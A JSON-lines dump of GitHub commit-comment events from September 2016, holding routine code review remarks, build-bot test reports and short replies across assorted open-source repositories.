{"id":"4572714720","type":"CommitCommentEvent","actor":{"login":"excetara2"},"repo":{"name":"aziz/SublimeFileBrowser"},"payload":{"comment":{"id":19050234,"position":null,"line":null,"path":null,"commit_id":"1f74eda6fdb8917f87755625be61cf1842634833","created_at":"2016-09-16T08:10:26Z","updated_at":"2016-09-16T08:10:26Z","body":"Thanks for this! Assuming you still haven't submitted to package manager a new version as preview or this are not working. I had removed my copy with fork with all the new additions wasn't necessary."}},"created_at":"2016-09-16T08:10:26Z"}
{"id":"4572715293","type":"CommitCommentEvent","actor":{"login":"sofusalbertsen"},"repo":{"name":"sofusalbertsen/deleteme"},"payload":{"comment":{"id":19050237,"position":1,"line":1,"path":"README.md","commit_id":"240c71e93d8b9003ad576dcf867cb7123cf25b99","created_at":"2016-09-16T08:10:35Z","updated_at":"2016-09-16T08:10:35Z","body":"What is this?"}},"created_at":"2016-09-16T08:10:35Z"}
{"id":"4572716340","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19050239,"position":45,"line":45,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/InMemoryMessageIdProvider.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-16T08:10:52Z","updated_at":"2016-09-16T08:10:52Z","body":"That's true :-) I have to admit that I was primarily looking at it from a server's perspective. However, if we do look at it from a server's perspective, do you think that resizing the map in rapid succession, e.g. because in the morning all clients connect almost at once, will pose a problem?"}},"created_at":"2016-09-16T08:10:52Z"}
{"id":"4572717153","type":"CommitCommentEvent","actor":{"login":"beheh"},"repo":{"name":"HearthSim/extract-scripts"},"payload":{"comment":{"id":19050244,"position":null,"line":null,"path":null,"commit_id":"3d348dd3e028eb67f09525c521aeb65c45c07533","created_at":"2016-09-16T08:11:04Z","updated_at":"2016-09-16T08:11:04Z","body":"Two times 6.1.1 and no 6.1.0?"}},"created_at":"2016-09-16T08:11:04Z"}
{"id":"4572717269","type":"CommitCommentEvent","actor":{"login":"dmitryd"},"repo":{"name":"dmitryd/typo3-realurl"},"payload":{"comment":{"id":19050245,"position":null,"line":null,"path":null,"commit_id":"36166de3ce47c2cc8d6ef450f80ca8127d6b7bbd","created_at":"2016-09-16T08:11:07Z","updated_at":"2016-09-16T08:11:07Z","body":"Realurl 1.x is no longer supported or maintained. TYPO3 fix did not go to 4.5 ELTS and for TYPO3 6.2 you should use realurl 2.x."}},"created_at":"2016-09-16T08:11:07Z"}
{"id":"4572718597","type":"CommitCommentEvent","actor":{"login":"jleclanche"},"repo":{"name":"HearthSim/extract-scripts"},"payload":{"comment":{"id":19050249,"position":null,"line":null,"path":null,"commit_id":"3d348dd3e028eb67f09525c521aeb65c45c07533","created_at":"2016-09-16T08:11:26Z","updated_at":"2016-09-16T08:11:26Z","body":"yea"}},"created_at":"2016-09-16T08:11:26Z"}
{"id":"4572721657","type":"CommitCommentEvent","actor":{"login":"patriknw"},"repo":{"name":"2m/akka"},"payload":{"comment":{"id":19050257,"position":59,"line":59,"path":"akka-remote/src/test/scala/akka/remote/artery/HandshakeDenySpec.scala","commit_id":"7c4573ae36a170cdc4ab935c6c626bcb3d72b389","created_at":"2016-09-16T08:12:18Z","updated_at":"2016-09-16T08:12:18Z","body":"Johan wrote this awesome `ArteryMultiNodeSpec` helper that will take care of the lifecycle of additional actor systems. I'd prefer that we use that."}},"created_at":"2016-09-16T08:12:18Z"}
{"id":"4572721967","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19050258,"position":null,"line":null,"path":null,"commit_id":"10e34c5f35b71410cee7de6cdec5d1dc63c1379a","created_at":"2016-09-16T08:12:22Z","updated_at":"2016-09-16T08:12:22Z","body":"ASIHPValidation (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1190 of 1190 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-10e34c5f35b71410cee7de6cdec5d1dc63c1379a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-10e34c5f35b71410cee7de6cdec5d1dc63c1379a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-10e34c5f35b71410cee7de6cdec5d1dc63c1379a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.1%25-green.svg)</a>\n"}},"created_at":"2016-09-16T08:12:22Z"}
{"id":"4572725566","type":"CommitCommentEvent","actor":{"login":"patriknw"},"repo":{"name":"2m/akka"},"payload":{"comment":{"id":19050270,"position":40,"line":40,"path":"akka-remote/src/test/scala/akka/remote/artery/HandshakeDenySpec.scala","commit_id":"7c4573ae36a170cdc4ab935c6c626bcb3d72b389","created_at":"2016-09-16T08:13:19Z","updated_at":"2016-09-16T08:13:19Z","body":"with `ArteryMultiNodeSpec` this is:\r\n`val systemB = newRemoteSystem(name = Some(\"systemB\"))`"}},"created_at":"2016-09-16T08:13:19Z"}
{"id":"4572725665","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19050271,"position":null,"line":null,"path":null,"commit_id":"10e34c5f35b71410cee7de6cdec5d1dc63c1379a","created_at":"2016-09-16T08:13:20Z","updated_at":"2016-09-16T08:13:20Z","body":"ASIHPValidation (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-10e34c5f35b71410cee7de6cdec5d1dc63c1379a-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-16T08:13:20Z"}
{"id":"4572728715","type":"CommitCommentEvent","actor":{"login":"patriknw"},"repo":{"name":"2m/akka"},"payload":{"comment":{"id":19050276,"position":45,"line":45,"path":"akka-remote/src/test/scala/akka/remote/artery/HandshakeDenySpec.scala","commit_id":"7c4573ae36a170cdc4ab935c6c626bcb3d72b389","created_at":"2016-09-16T08:14:06Z","updated_at":"2016-09-16T08:14:06Z","body":"with `ArteryMultiNodeSpec` this is:\r\n`val sel = system.actorSelection(rootActorPath(systemB) / \"user\" / \"echo\")`"}},"created_at":"2016-09-16T08:14:06Z"}
{"id":"4572730230","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19050282,"position":null,"line":null,"path":null,"commit_id":"10e34c5f35b71410cee7de6cdec5d1dc63c1379a","created_at":"2016-09-16T08:14:28Z","updated_at":"2016-09-16T08:14:28Z","body":"ASIHPValidation (Myoldmopar) - i386-Windows-7-VisualStudio-12: OK (2335 of 2336 tests passed, 0 test warnings)\n\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-10e34c5f35b71410cee7de6cdec5d1dc63c1379a-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-10e34c5f35b71410cee7de6cdec5d1dc63c1379a-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-16T08:14:28Z"}
{"id":"4572731542","type":"CommitCommentEvent","actor":{"login":"zosjtjsenko"},"repo":{"name":"zosjtjsenko/TestAutomation"},"payload":{"comment":{"id":19050291,"position":null,"line":null,"path":null,"commit_id":"741eb82387f0c96f22b50c713a57b98008260b2f","created_at":"2016-09-16T08:14:50Z","updated_at":"2016-09-16T08:14:50Z","body":"test"}},"created_at":"2016-09-16T08:14:50Z"}
{"id":"4572732500","type":"CommitCommentEvent","actor":{"login":"miclaus"},"repo":{"name":"fhstp-mfg/mobilot"},"payload":{"comment":{"id":19050296,"position":14,"line":28,"path":"public/app/modules/mobidul/station/creator/directives/EditorDirective.js","commit_id":"f785aa619aab82433a73cf66b04f660b3d603d81","created_at":"2016-09-16T08:15:07Z","updated_at":"2016-09-16T08:15:07Z","body":"You are totally right!\r\n\r\nHowever, what would we do in case there is a new Mobidul mode, which has more than one state, but only one is configurable and the other not?\r\n\r\nIn that case you would also want to be able to hide the station states.\r\n\r\nBut you are right that is uncertain, that there will be such a mode in the future.\r\n\r\nIf you want we could remove this and implement it when (if even in the future) necessary. :) "}},"created_at":"2016-09-16T08:15:07Z"}
{"id":"4572733719","type":"CommitCommentEvent","actor":{"login":"Adevade"},"repo":{"name":"anuko/timetracker"},"payload":{"comment":{"id":19050299,"position":null,"line":null,"path":null,"commit_id":"ca5499dc79c9604c7ccf8b29257a5f5b45a71645","created_at":"2016-09-16T08:15:26Z","updated_at":"2016-09-16T08:15:26Z","body":"Actually, we have many words where the singular and the plural form are the same. Like the English; one sheep, many sheep. This is also the case for *Projekt* and *Användare*, so they were correct as they were before."}},"created_at":"2016-09-16T08:15:26Z"}
{"id":"4572736105","type":"CommitCommentEvent","actor":{"login":"patriknw"},"repo":{"name":"2m/akka"},"payload":{"comment":{"id":19050304,"position":50,"line":50,"path":"akka-remote/src/test/scala/akka/remote/artery/HandshakeDenySpec.scala","commit_id":"7c4573ae36a170cdc4ab935c6c626bcb3d72b389","created_at":"2016-09-16T08:16:04Z","updated_at":"2016-09-16T08:16:04Z","body":"the logging occurs in systemB, so you must pass `systemB` in the parameter to `EventFilter` (I think it's an implicit, but you can pass it explicitly)"}},"created_at":"2016-09-16T08:16:04Z"}
{"id":"4572737211","type":"CommitCommentEvent","actor":{"login":"patriknw"},"repo":{"name":"2m/akka"},"payload":{"comment":{"id":19050307,"position":52,"line":52,"path":"akka-remote/src/test/scala/akka/remote/artery/HandshakeDenySpec.scala","commit_id":"7c4573ae36a170cdc4ab935c6c626bcb3d72b389","created_at":"2016-09-16T08:16:21Z","updated_at":"2016-09-16T08:16:21Z","body":"enough with `1.second` here"}},"created_at":"2016-09-16T08:16:21Z"}
{"id":"4572740492","type":"CommitCommentEvent","actor":{"login":"karup1990"},"repo":{"name":"apache/zeppelin"},"payload":{"comment":{"id":19050314,"position":34,"line":57,"path":"zeppelin-web/src/app/interpreter/interpreter.controller.js","commit_id":"21a084b170b29dee0f2d57aae22b00c785ef0c8e","created_at":"2016-09-16T08:17:16Z","updated_at":"2016-09-16T08:17:16Z","body":"Agreed. But 2 seconds seems low to me(especially for maven artifacts with transitive deps). But we don't have a definite way to determine the total time either.\r\nAlso we are not polling here, we are using timeout."}},"created_at":"2016-09-16T08:17:16Z"}
{"id":"4572743849","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/skins"},"payload":{"comment":{"id":19050323,"position":null,"line":null,"path":null,"commit_id":"72a57da7c1e4b71076d869541466fae8e30e2567","created_at":"2016-09-16T08:18:12Z","updated_at":"2016-09-16T08:18:12Z","body":"Sorry: commit was about 'Magic-FHD', not 'Magic-HD'."}},"created_at":"2016-09-16T08:18:12Z"}
{"id":"4572747300","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19050336,"position":null,"line":null,"path":null,"commit_id":"9cd6a8c1ae2ad2af5ec56e0dbf6852f3ebf9e005","created_at":"2016-09-16T08:19:08Z","updated_at":"2016-09-16T08:19:08Z","body":"No, what I meant was the \"name\" that it says below \"version\", right here:\r\n\r\n    \"id\": \"uniqbot_one\",\r\n    \"version\": 2,\r\n    \"name\": \"Uniqbot\",\r\n\r\nIt's duplicating information now, but removing that name has vast implications for Uranium."}},"created_at":"2016-09-16T08:19:08Z"}
{"id":"4572748731","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"poloniculmov/hammer"},"payload":{"comment":{"id":19050340,"position":13,"line":15,"path":"app/extra/csv_parser.rb","commit_id":"5a214aa640c6edd43eecf5b8ee25abd1c83a573c","created_at":"2016-09-16T08:19:31Z","updated_at":"2016-09-16T08:19:31Z","body":"What happens if this line fails for a certain product?"}},"created_at":"2016-09-16T08:19:31Z"}
{"id":"4572754358","type":"CommitCommentEvent","actor":{"login":"samisalimi"},"repo":{"name":"UB12/mr690"},"payload":{"comment":{"id":19050348,"position":2,"line":240,"path":"bot/sbssbot.lua","commit_id":"47373a6ef2bd41ddd41119ee3ce20e42fba703dd","created_at":"2016-09-16T08:20:59Z","updated_at":"2016-09-16T08:20:59Z","body":"welcome to panda group\r\n"}},"created_at":"2016-09-16T08:20:59Z"}
{"id":"4572755085","type":"CommitCommentEvent","actor":{"login":"navyxhj"},"repo":{"name":"navyxhj/workstation"},"payload":{"comment":{"id":19050350,"position":2,"line":2,"path":"README.md","commit_id":"a65494f776fe970327288396bc6ce8b63cf3e106","created_at":"2016-09-16T08:21:10Z","updated_at":"2016-09-16T08:21:10Z","body":"## 版本控制软件\r\n\r\n看了一下git的使用感觉不错,阮一峰的博客不错,可以学习一下,[连接这里][http://www.liaoxuefeng.com/wiki/0013739516305929606dd18361248578c67b8067c8c017b000]\r\n\r\n\r\n\r\n\r\n昨天到今天一直在搞Python35环境下的编程,感觉版本控制工具也应该升级了,应该从SVN的思路上跳出来, 使用git方法写程序\r\n"}},"created_at":"2016-09-16T08:21:10Z"}
{"id":"4572755359","type":"CommitCommentEvent","actor":{"login":"mstock"},"repo":{"name":"MattKetmo/darkroomjs"},"payload":{"comment":{"id":19050354,"position":13,"line":135,"path":"lib/js/plugins/darkroom.crop.js","commit_id":"d256d9252a016b795b59ff207d99c6d89fb67a06","created_at":"2016-09-16T08:21:15Z","updated_at":"2016-09-16T08:21:15Z","body":"Shouldn't that be `y3 + 1` (instead of `y3 - 1`)? Right now, I think that the bottom line is not horizontal, but slightly ascending from the lower right corner to the lower left corner."}},"created_at":"2016-09-16T08:21:15Z"}
{"id":"4572755960","type":"CommitCommentEvent","actor":{"login":"poloniculmov"},"repo":{"name":"poloniculmov/hammer"},"payload":{"comment":{"id":19050356,"position":13,"line":15,"path":"app/extra/csv_parser.rb","commit_id":"5a214aa640c6edd43eecf5b8ee25abd1c83a573c","created_at":"2016-09-16T08:21:24Z","updated_at":"2016-09-16T08:21:24Z","body":"it throws an exception, which was great while developing, but I should've removed it and handled (or ignored) that failure"}},"created_at":"2016-09-16T08:21:24Z"}
{"id":"4572756007","type":"CommitCommentEvent","actor":{"login":"valberg"},"repo":{"name":"benjaoming/django-wiki"},"payload":{"comment":{"id":19050357,"position":null,"line":null,"path":null,"commit_id":"688999ebce5cc2ddeb65c9383fd375c2f7b9dc26","created_at":"2016-09-16T08:21:25Z","updated_at":"2016-09-16T08:21:25Z","body":"👏"}},"created_at":"2016-09-16T08:21:25Z"}
{"id":"4572757148","type":"CommitCommentEvent","actor":{"login":"gregpriday"},"repo":{"name":"siteorigin/so-css"},"payload":{"comment":{"id":19050361,"position":null,"line":null,"path":null,"commit_id":"27c3ded99a5fda018520d25c6081f3b50f5ca0f3","created_at":"2016-09-16T08:21:44Z","updated_at":"2016-09-16T08:21:44Z","body":"Nice fix. How much does this improve the performance issue?"}},"created_at":"2016-09-16T08:21:44Z"}
{"id":"4572764512","type":"CommitCommentEvent","actor":{"login":"ankit09goyal"},"repo":{"name":"ankit09goyal/AllAboutAnime"},"payload":{"comment":{"id":19050372,"position":70,"line":136,"path":"AllAboutAnime-ejb/src/java/com/allabtanime/business/BaseManager.java","commit_id":"fe270bd7e279c046154f2879093ef0b9c065104d","created_at":"2016-09-16T08:23:42Z","updated_at":"2016-09-16T08:23:42Z","body":"add maxRowsToFtech<0 check"}},"created_at":"2016-09-16T08:23:42Z"}
{"id":"4572765138","type":"CommitCommentEvent","actor":{"login":"patriknw"},"repo":{"name":"2m/akka"},"payload":{"comment":{"id":19050374,"position":56,"line":208,"path":"akka-remote/src/main/scala/akka/remote/artery/Handshake.scala","commit_id":"7c4573ae36a170cdc4ab935c6c626bcb3d72b389","created_at":"2016-09-16T08:23:51Z","updated_at":"2016-09-16T08:23:51Z","body":"I think this should be at warning level, it's caused by some kind of user misconfiguration.\r\n\r\nPerhaps add something like.\r\n\"Check in the sending system that the hostname used in for example actor selections or seed-nodes matches the 'akka.remote.artery.canonical.hostname' in the recipient system. The name of the ActorSystem must also match.\""}},"created_at":"2016-09-16T08:23:51Z"}
{"id":"4572767065","type":"CommitCommentEvent","actor":{"login":"gregpriday"},"repo":{"name":"siteorigin/so-css"},"payload":{"comment":{"id":19050380,"position":null,"line":null,"path":null,"commit_id":"27c3ded99a5fda018520d25c6081f3b50f5ca0f3","created_at":"2016-09-16T08:24:18Z","updated_at":"2016-09-16T08:24:18Z","body":"Never mind. See your comment in the PR."}},"created_at":"2016-09-16T08:24:18Z"}
{"id":"4572767783","type":"CommitCommentEvent","actor":{"login":"udesou"},"repo":{"name":"TUDelft-IN4303-2016/TUDelft-IN4303-2016.github.io"},"payload":{"comment":{"id":19050381,"position":5,"line":65,"path":"assignments/index.md","commit_id":"e61ed0960cd070f7d45d89c6effcddb67d7f70c7","created_at":"2016-09-16T08:24:29Z","updated_at":"2016-09-16T08:24:29Z","body":"@eelcovisser I commented these and removed them from the website because they refer to the policies Guido used last year. I sort of remember what yours are (2 late days or something like that), but I was not sure. Please write them here if needed."}},"created_at":"2016-09-16T08:24:29Z"}
{"id":"4572771533","type":"CommitCommentEvent","actor":{"login":"patriknw"},"repo":{"name":"2m/akka"},"payload":{"comment":{"id":19050387,"position":null,"line":null,"path":null,"commit_id":"7c4573ae36a170cdc4ab935c6c626bcb3d72b389","created_at":"2016-09-16T08:25:24Z","updated_at":"2016-09-16T08:25:24Z","body":"Also, remove \r\n`localAddress, // FIXME: this is used for the \"non-local recipient\" check in MessageDispatcher. Is this needed anymore?` in the Decoder, i.e. remove that field from the `InboundEnvelope`\r\n\r\nand remove the check in the MessageDispatcher"}},"created_at":"2016-09-16T08:25:24Z"}
{"id":"4572771696","type":"CommitCommentEvent","actor":{"login":"josuegj"},"repo":{"name":"GoogleChrome/accessibility-developer-tools"},"payload":{"comment":{"id":19050388,"position":13,"line":58,"path":"src/js/ContentScriptFramework.js","commit_id":"c58693a1033d5726230322432e3df0a6db66a604","created_at":"2016-09-16T08:25:26Z","updated_at":"2016-09-16T08:25:26Z","body":"Dd"}},"created_at":"2016-09-16T08:25:26Z"}
{"id":"4572772113","type":"CommitCommentEvent","actor":{"login":"Brio12"},"repo":{"name":"kcts/Busbooking"},"payload":{"comment":{"id":19050390,"position":null,"line":null,"path":null,"commit_id":"e12ff8d58d61d34d4c86ef8e90e981e2fa3aea7c","created_at":"2016-09-16T08:25:32Z","updated_at":"2016-09-16T08:25:32Z","body":"Hey. what happened to this project? You stopped"}},"created_at":"2016-09-16T08:25:32Z"}
{"id":"4572773764","type":"CommitCommentEvent","actor":{"login":"nanocell"},"repo":{"name":"leaping-rhino/chef-cookbook-ca-openldap"},"payload":{"comment":{"id":19050395,"position":null,"line":null,"path":null,"commit_id":"dfea52b5609dde4dee65f761bd5b4a8c3a41c451","created_at":"2016-09-16T08:25:58Z","updated_at":"2016-09-16T08:25:58Z","body":"Refer to this post for Chef < 11.6.0 lazy evaluation: http://stackoverflow.com/questions/14633509/is-there-any-way-to-delay-a-resources-attribute-resolution-until-the-execute"}},"created_at":"2016-09-16T08:25:58Z"}
{"id":"4572782022","type":"CommitCommentEvent","actor":{"login":"fionera"},"repo":{"name":"CodeforRuhrgebiet/open-pott"},"payload":{"comment":{"id":19050416,"position":null,"line":null,"path":null,"commit_id":"d8eb66a1735ca2baeabe7dd32daff626c3142946","created_at":"2016-09-16T08:27:58Z","updated_at":"2016-09-16T08:27:58Z","body":"Im so dumb :dancer: "}},"created_at":"2016-09-16T08:27:58Z"}
{"id":"4572782421","type":"CommitCommentEvent","actor":{"login":"Plamen5kov"},"repo":{"name":"NativeScript/android-runtime"},"payload":{"comment":{"id":19050420,"position":15,"line":69,"path":"runtime/src/main/jni/CallbackHandlers.cpp","commit_id":"7f135764cad7fa6441028d380f8f7fa522947197","created_at":"2016-09-16T08:28:05Z","updated_at":"2016-09-16T08:28:05Z","body":"We can think about using the stringify function right before we need to call it instead of caching it, so we give the user a chance to override JSON.stringify with some specific functionality. The current implementation is the safe way to go."}},"created_at":"2016-09-16T08:28:05Z"}
{"id":"4572782978","type":"CommitCommentEvent","actor":{"login":"knocte"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":19050421,"position":null,"line":null,"path":null,"commit_id":"9804bbc9dae393e03f1750ab50807d326be0e980","created_at":"2016-09-16T08:28:12Z","updated_at":"2016-09-16T08:28:12Z","body":"This change is scary. No unit-test love? :grimacing: "}},"created_at":"2016-09-16T08:28:12Z"}
{"id":"4572785619","type":"CommitCommentEvent","actor":{"login":"cmg-dev"},"repo":{"name":"BjoernBueltmann/dotfiles"},"payload":{"comment":{"id":19050430,"position":17,"line":73,"path":"install/brew.sh","commit_id":"1c7d9c1a220632c539c2977d8ff6fb62d62e12cd","created_at":"2016-09-16T08:28:57Z","updated_at":"2016-09-16T08:28:57Z","body":"Please take care of this.\r\n\r\nThere needs to be a newline (```\\n```) at the end of the file.\r\n\r\nSetup your editor to do this for you!"}},"created_at":"2016-09-16T08:28:57Z"}
{"id":"4572787116","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"poloniculmov/hammer"},"payload":{"comment":{"id":19050431,"position":3,"line":3,"path":"app/extra/csv_parser.rb","commit_id":"5a214aa640c6edd43eecf5b8ee25abd1c83a573c","created_at":"2016-09-16T08:29:20Z","updated_at":"2016-09-16T08:29:20Z","body":"If you would write down the contract of this method, what would you write for `return`?"}},"created_at":"2016-09-16T08:29:20Z"}
{"id":"4572789838","type":"CommitCommentEvent","actor":{"login":"olistik"},"repo":{"name":"comune-desio/azuredesio"},"payload":{"comment":{"id":19050438,"position":null,"line":null,"path":null,"commit_id":"2c4b6a6b95f17ac89cb68d9555cbc888ae3a4195","created_at":"2016-09-16T08:30:02Z","updated_at":"2016-09-16T08:30:02Z","body":"@ipersoft c'era un typo: https://github.com/comune-desio/azuredesio/commit/dbe43f3075a6a1599cf9ba47629bb9af3ca6ac91 ^_^'"}},"created_at":"2016-09-16T08:30:02Z"}
{"id":"4572790040","type":"CommitCommentEvent","actor":{"login":"patriknw"},"repo":{"name":"2m/akka"},"payload":{"comment":{"id":19050441,"position":19,"line":19,"path":"akka-remote/src/test/scala/akka/remote/artery/HandshakeDenySpec.scala","commit_id":"7c4573ae36a170cdc4ab935c6c626bcb3d72b389","created_at":"2016-09-16T08:30:06Z","updated_at":"2016-09-16T08:30:06Z","body":"with ArteryMultiNodeSpec this is not neeed"}},"created_at":"2016-09-16T08:30:06Z"}
{"id":"4572792660","type":"CommitCommentEvent","actor":{"login":"Pip3r4o"},"repo":{"name":"NativeScript/android-runtime"},"payload":{"comment":{"id":19050452,"position":15,"line":69,"path":"runtime/src/main/jni/CallbackHandlers.cpp","commit_id":"7f135764cad7fa6441028d380f8f7fa522947197","created_at":"2016-09-16T08:30:40Z","updated_at":"2016-09-16T08:30:40Z","body":" Few will choose to override JSON.stringify, and if they do, they can call it directly and send the string instead, while not caching the function in a Persistent handle could potentially be a big overhead when using postMessage heavily"}},"created_at":"2016-09-16T08:30:40Z"}
{"id":"4572794221","type":"CommitCommentEvent","actor":{"login":"ReinerBforartists"},"repo":{"name":"Bforartists/Bforartists"},"payload":{"comment":{"id":19050457,"position":null,"line":null,"path":null,"commit_id":"84015b9a326c78a9728376d41e23931e2d9b4d42","created_at":"2016-09-16T08:31:04Z","updated_at":"2016-09-16T08:31:04Z","body":"Issue: http://www.bforartists.de/content/extrude-menu-toolshelf-issues"}},"created_at":"2016-09-16T08:31:04Z"}
{"id":"4572801852","type":"CommitCommentEvent","actor":{"login":"jyskweb"},"repo":{"name":"dmitryd/typo3-realurl"},"payload":{"comment":{"id":19050469,"position":null,"line":null,"path":null,"commit_id":"36166de3ce47c2cc8d6ef450f80ca8127d6b7bbd","created_at":"2016-09-16T08:33:07Z","updated_at":"2016-09-16T08:33:07Z","body":"Ok, the extension _yag_ 4.0.x is the last version supporting 6.2 and is only working with realurl 1.x... that's why I asked - you might say _yag_ is the one to adapt it's dependencies ;-)"}},"created_at":"2016-09-16T08:33:07Z"}
{"id":"4572802486","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":19050473,"position":null,"line":null,"path":null,"commit_id":"ef7577f5e48ad1e72a49e672e1eabd5b7d345b4d","created_at":"2016-09-16T08:33:15Z","updated_at":"2016-09-16T08:33:15Z","body":"@joergoster you are right, thanks. It seems that the initiative score (and bench) is very sensitive to a change in the divider. In take 2 I used a value of 100 and the test failed fast. In take 3 I used 99 and the test seems to perform a lot better."}},"created_at":"2016-09-16T08:33:15Z"}
{"id":"4572803424","type":"CommitCommentEvent","actor":{"login":"poloniculmov"},"repo":{"name":"poloniculmov/hammer"},"payload":{"comment":{"id":19050474,"position":3,"line":3,"path":"app/extra/csv_parser.rb","commit_id":"5a214aa640c6edd43eecf5b8ee25abd1c83a573c","created_at":"2016-09-16T08:33:28Z","updated_at":"2016-09-16T08:33:28Z","body":"In this iteration it returns nil if there is no csv to parse and an open struct with the results, it's update later to return an openstruct in both cases."}},"created_at":"2016-09-16T08:33:28Z"}
{"id":"4572805588","type":"CommitCommentEvent","actor":{"login":"abisz"},"repo":{"name":"fhstp-mfg/mobilot"},"payload":{"comment":{"id":19050479,"position":14,"line":28,"path":"public/app/modules/mobidul/station/creator/directives/EditorDirective.js","commit_id":"f785aa619aab82433a73cf66b04f660b3d603d81","created_at":"2016-09-16T08:34:01Z","updated_at":"2016-09-16T08:34:01Z","body":"I understand what you're meaning. I just can't think of a use case for a state that isn't configurable. Why would we need to safe something that can't change?"}},"created_at":"2016-09-16T08:34:01Z"}
{"id":"4572805838","type":"CommitCommentEvent","actor":{"login":"zhy755788055"},"repo":{"name":"zhy755788055/ChineseChess"},"payload":{"comment":{"id":19050480,"position":null,"line":null,"path":null,"commit_id":"bdcbb3db954de699c5c628dc32ad147327825848","created_at":"2016-09-16T08:34:05Z","updated_at":"2016-09-16T08:34:05Z","body":"代码洁癖"}},"created_at":"2016-09-16T08:34:05Z"}
{"id":"4572806701","type":"CommitCommentEvent","actor":{"login":"dkellenb"},"repo":{"name":"dkellenb/formula-evaluator"},"payload":{"comment":{"id":19050482,"position":null,"line":null,"path":null,"commit_id":"c9178e12f2bd4c731dee805f77bf8eef4144e072","created_at":"2016-09-16T08:34:17Z","updated_at":"2016-09-16T08:34:17Z","body":"This commit fixes dkellenb/formula-evaluator#2"}},"created_at":"2016-09-16T08:34:17Z"}
{"id":"4572806917","type":"CommitCommentEvent","actor":{"login":"zhy755788055"},"repo":{"name":"zhy755788055/ChineseChess"},"payload":{"comment":{"id":19050484,"position":null,"line":null,"path":null,"commit_id":"bdcbb3db954de699c5c628dc32ad147327825848","created_at":"2016-09-16T08:34:20Z","updated_at":"2016-09-16T08:34:20Z","body":"代码洁癖"}},"created_at":"2016-09-16T08:34:20Z"}
{"id":"4572809576","type":"CommitCommentEvent","actor":{"login":"dmitryd"},"repo":{"name":"dmitryd/typo3-realurl"},"payload":{"comment":{"id":19050490,"position":null,"line":null,"path":null,"commit_id":"36166de3ce47c2cc8d6ef450f80ca8127d6b7bbd","created_at":"2016-09-16T08:34:58Z","updated_at":"2016-09-16T08:34:58Z","body":"Extensions should not call realurl directly. This is quite bad. They should use TYPO3 API to make links. If the extension calls realurl directly, it is a good reason to avoid that extension."}},"created_at":"2016-09-16T08:34:58Z"}
{"id":"4572811323","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"poloniculmov/hammer"},"payload":{"comment":{"id":19050492,"position":36,"line":36,"path":"spec/extra/csv_parser_spec.rb","commit_id":"5a214aa640c6edd43eecf5b8ee25abd1c83a573c","created_at":"2016-09-16T08:35:25Z","updated_at":"2016-09-16T08:35:25Z","body":"Feel the need for some specs for the added/modified/deleted products, and the result"}},"created_at":"2016-09-16T08:35:25Z"}
{"id":"4572811963","type":"CommitCommentEvent","actor":{"login":"samisalimi"},"repo":{"name":"samisalimi/panda_bot"},"payload":{"comment":{"id":19050502,"position":1,"line":1,"path":"README.md","commit_id":"4b908156008910dc39aca89e1d0255eb66de4bd6","created_at":"2016-09-16T08:35:33Z","updated_at":"2016-09-16T08:35:33Z","body":"welcome\r\n"}},"created_at":"2016-09-16T08:35:33Z"}
{"id":"4572812431","type":"CommitCommentEvent","actor":{"login":"sylvestre"},"repo":{"name":"mozilla/clouseau"},"payload":{"comment":{"id":19050506,"position":35,"line":38,"path":"clouseau/gfx_critical_errors.py","commit_id":"4814e4c558f855adf4bd5843ea383fae556fe2d5","created_at":"2016-09-16T08:35:39Z","updated_at":"2016-09-16T08:35:39Z","body":"ah ah\r\n"}},"created_at":"2016-09-16T08:35:39Z"}
